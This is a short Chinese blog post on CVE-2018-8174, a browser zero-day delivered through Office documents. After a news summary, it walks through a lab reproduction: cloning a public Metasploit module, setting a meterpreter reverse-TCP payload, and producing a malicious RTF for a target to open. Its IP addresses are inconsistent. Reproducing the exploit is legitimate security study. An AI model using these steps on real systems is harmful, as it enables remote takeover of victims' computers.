近日,360安全中心在全球范围内率先监测到一例使用0day漏洞的APT攻击,经分析发现,该攻击是全球首个使用浏览器0day漏洞的新型Office文档攻击。只要打开恶意文档就可能中招,被黑客植入后门木马甚至完全控制电脑。
黑客是通过投递内嵌恶意网页的Office文档的形式实施此次APT攻击,中招者打开文档后,所有的漏洞利用代码和恶意荷载都通过远程的服务器加载。攻击的后期利用阶段使用了公开的UAC绕过技术,并利用了文件隐写技术和内存反射加载的方式来避免流量监测和实现无文件落地加载。
复现过程:
环境:Parrot虚拟机、Metasploit模块
1、Github上获得漏洞模块

git clone https://github.com/0x09AL/CVE-2018-8174-msf.git

图1
2、将刚刚下载的模块中的CVE-2018-8174.rb复制到fileformat目录

cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

![图2][2]
将CVE-2018-8174.rtf复制到exploits目录

cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/

![图3][3]
3、启动我们的metasploit

use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.0.116
set lhost 192.168.0.116
exploit

请输入图片描述

后面打开192.168.44.44:8080,
或者复制 /root/.msf4/local/目录中的 msf.rtf 文件到目标主机上使用word文档打开

注意:一定得IE32位,word仅支持Mircrosoft Office32位